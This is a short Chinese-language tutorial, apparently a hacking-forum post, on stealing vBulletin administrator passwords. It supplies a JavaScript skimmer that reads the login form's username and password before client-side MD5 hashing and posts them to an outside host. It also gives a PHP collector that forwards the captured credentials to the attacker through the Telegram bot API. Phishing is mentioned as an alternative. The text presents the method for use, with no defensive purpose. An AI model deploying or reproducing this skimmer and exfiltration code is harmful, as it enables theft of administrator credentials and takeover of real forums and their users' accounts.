如何窃取 vBulletin 管理员密码

通过数据库中的加密密码来更改管理加密密码以访问管理面板，但您可能很快就会离开服务器。

但是有一个更好的解决方案，可以通过网络钓鱼攻击或使用JavaScript窃取密码来获取管理员纯文本密码，我将在本主题中进行介绍。

我们可以使用PHP并在发布请求后获取密码，但是vBulletin会在客户端使用JavaScript使用MD5加密密码，因此我们将尝试在密码加密之前获取密码。

我将使用的脚本是：

function mal()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://example/admindata.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);
}

给定的脚本获取密码并将其发送到PHP脚本，然后将其写入文件或使用电报或电子邮件将其发送给您（使用电报API的示例）：

<?php

if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
{
$token = "YOUR_TOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage? 
chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
}
else
    header("Location: https://google.com");
?>

因此，现在您可以将PHP脚本上传到同一台服务器或同一台服务器上，或者可以直接从JavaScript发送密码。